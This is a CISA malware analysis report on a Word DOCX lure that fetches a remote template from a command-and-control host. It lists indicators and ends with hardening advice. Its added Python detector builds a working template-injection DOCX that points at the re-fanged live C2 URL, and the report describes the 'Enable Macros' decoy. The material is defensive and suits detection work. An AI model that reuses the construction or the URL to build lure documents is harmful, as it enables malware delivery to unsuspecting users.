Malware Analysis Report (AR20-133G)

MAR-10285677-2.v1


Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

One Microsoft Word Open Extensible Markup Language (XML) Format Document file (DOCX file) was submitted for analysis. When opened, the file attempts to download a Microsoft Word template from an external Uniform Resource Locator (URL). The URL was not active at the time of analysis, so the template itself could not be retrieved or examined.

For a downloadable copy of IOCs, see MAR-10285677-2.v1.stix.

Submitted Files (1)

7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015 (7d2b9f391588cc07d9ba78d652819d...)

Domains (1)

crphone.mireene.com

Findings

7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015

Tags

CVE-2017-0199, downloader, trojan

Details
Name: 7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015
Size: 225448 bytes
Type: Microsoft Word 2007+
MD5: a4388c4d0588cd3d8a607594347663e0
SHA1: b066369bbd48b7858f2c1eed1e78d85c8ae4cdb6
SHA256: 7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015
SHA512: 6cb4ade649094cf14735830627497826f40fabb400308cfc9ebe4c262dd6dd49185baab877d5393a67df2516b3f99a7b5ab8f958d7ccddb5c0838b48814532f1
ssdeep: 6144:PMtCBStDIwnddEwBj6U19akUWzZECImdzxGdakUWzZECImdzxGdm:ktCBPwnddEwJ6Umk0ChGck0ChGs
Entropy: 7.965669

Antivirus

Ahnlab: DOC/Downloader
Antiy: Trojan[Exploit]/MSOffice.CVE-2017-0199
Avira: EXP/CVE-2017-0199.joxaz
BitDefender: Trojan.GenericKD.42863619
ESET: DOC/TrojanDownloader.Agent.CF trojan
Emsisoft: Trojan.GenericKD.42863619 (B)
Ikarus: Exploit.CVE-2017-0199
McAfee: Trojan-FRVP!201AEB7EC56D
Microsoft Security Essentials: Exploit:O97M/CVE-2017-0199!MTB
NANOAV: Exploit.Xml.CVE-2017-0199.equmby
Sophos: Troj/DocDl-XXQ
Symantec: W97M.Downloader
Vir.IT eXplorer: W97M.Downloader.CBT
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
7d2b9f3915... Connected_To crphone.mireene.com
Description

This file is a Microsoft Word DOCX file (Figure 1). A DOCX is a ZIP container of XML parts; one of the relationship parts, "settings.xml.rels" (located at word/_rels/settings.xml.rels inside the container; Figure 2), declares an external attached template whose target is the following URL:

--Begin URL--
hxxp[:]//crphone.mireene[.]com/plugin/editor/Templates/normal.php?name=web
--End URL--

When a user opens the document in Word, it displays a lure asking the user to "Enable Macros" (Figure 1). The lure is a decoy: the DOCX itself contains no macros, so a scan for embedded VBA finds nothing, while Word attempts to fetch the attached template from the external network location when the document is opened for editing, before any macro prompt could appear. Any macros would arrive with that remote template, which is what the "Enable Macros" lure is preparing the user to accept. The URL was not available at the time of analysis, so the template's contents could not be examined.
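The check an analyst would run on an attachment like this one, as an added example that is not part of the original report and not the submitted sample's code: it first confirms the true file type (a ZIP/OOXML container, whatever extension the attachment carries), then walks every .rels part inside the package and reports any attachedTemplate relationship whose TargetMode is "External" and whose target points off-host. The DOCX it parses is constructed in memory by the script, carrying the URL from Figure 2 as its template target; all function and constant names are the example's own.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship namespace and the relationship type Word uses for the
# template referenced by <w:attachedTemplate r:id=.../> in word/settings.xml.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ATTACHED_TEMPLATE = R_NS + "/attachedTemplate"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
ZIP_MAGIC = b"PK\x03\x04"

# The template URL reported in Figure 2 of the MAR, re-fanged for the parser.
MAR_TEMPLATE_URL = "http://crphone.mireene.com/plugin/editor/Templates/normal.php?name=web"


def is_ooxml(data: bytes) -> bool:
    """'True file type' check: a DOCX is a ZIP container holding [Content_Types].xml."""
    if not data.startswith(ZIP_MAGIC):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return "[Content_Types].xml" in z.namelist()
    except zipfile.BadZipFile:
        return False


def is_network_target(target: str) -> bool:
    """True when an External target makes Word reach out over the network:
    http(s)/ftp URLs, UNC paths (also an NTLM-leak vector) and file:// with a host.
    A local file:///C:/... template path is normal and is not flagged."""
    t = target.strip()
    if re.match(r"^(https?|ftps?)://", t, re.I) or t.startswith("\\\\"):
        return True
    m = re.match(r"^file://([^/\\]*)", t, re.I)
    return bool(m and m.group(1).lower() not in ("", "localhost"))


def external_relationships(data: bytes) -> list[dict]:
    """Every TargetMode="External" relationship in every *.rels part of the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                hits.append({"part": name, "id": rel.get("Id"),
                             "type": rel.get("Type", "").rsplit("/", 1)[-1],
                             "target": rel.get("Target", "")})
    return hits


def remote_template_urls(data: bytes) -> list[str]:
    """Attached-template targets that Word would fetch from the network on open."""
    if not is_ooxml(data):
        raise ValueError("not an OOXML (ZIP) package")
    return [r["target"] for r in external_relationships(data)
            if r["type"] == "attachedTemplate" and is_network_target(r["target"])]


def build_sample_docx(template_target: str) -> bytes:
    """Constructed minimal DOCX for testing (not the submitted sample). The part that
    matters is word/_rels/settings.xml.rels, laid out as in Figure 2 of the report."""
    decl = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    parts = {
        "[Content_Types].xml": decl +
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>',
        "_rels/.rels": decl +
            f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
            f'Type="{R_NS}/officeDocument" Target="word/document.xml"/></Relationships>',
        "word/document.xml": decl +
            f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>Enable Macros</w:t>'
            '</w:r></w:p></w:body></w:document>',
        "word/settings.xml": decl +
            f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
            '<w:attachedTemplate r:id="rId1"/></w:settings>',
        # The injection point: an External attachedTemplate relationship.
        "word/_rels/settings.xml.rels": decl +
            f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
            f'Type="{ATTACHED_TEMPLATE}" Target="{template_target}" '
            'TargetMode="External"/></Relationships>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx(MAR_TEMPLATE_URL)
    print("OOXML container:", is_ooxml(sample))
    for url in remote_template_urls(sample):
        print("remote template target:", url)
```

Run it as-is to see the constructed sample flagged, or replace `sample` with the bytes of a real attachment. Walking every .rels part rather than only settings.xml.rels also surfaces external targets in other relationship types (oleObject, hyperlink, image), which is where the CVE-2017-0199 OLE variant and other remote-fetch tricks show up; the attachedTemplate filter is what isolates the technique described above.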

Screenshots
Figure 1 - Screenshot of the DOCX file.


Figure 2 - This XML relationship file contains the external URL from which a suspicious Microsoft Word template is downloaded.

crphone.mireene.com

Tags

command-and-control

URLs
  • hxxp[:]//crphone.mireene.com/plugin/editor/Templates/normal.php?name=web
Whois

Domain Name: MIREENE.COM
Registry Domain ID: 118139791_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.doregi.com
Registrar URL: http://www.doregi.com
Updated Date: 2017-02-23T02:39:15Z
Creation Date: 2004-04-24T02:46:25Z
Registry Expiry Date: 2021-04-24T02:46:25Z
Registrar: HANGANG Systems, Inc. dba Doregi.com
Registrar IANA ID: 87
Registrar Abuse Contact Email: abuse@doregi.com
Registrar Abuse Contact Phone: +82.7071631100
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.MIREENE.COM
Name Server: NS2.MIREENE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2020-04-27T11:39:43Z <<<

Relationships
crphone.mireene.com Connected_From 7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015
Description

The submitted file attempts to download what is likely a Microsoft Word template from this domain.

Relationship Summary

7d2b9f3915... Connected_To crphone.mireene.com
crphone.mireene.com Connected_From 7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.

Revisions

May 12, 2020: Initial Version
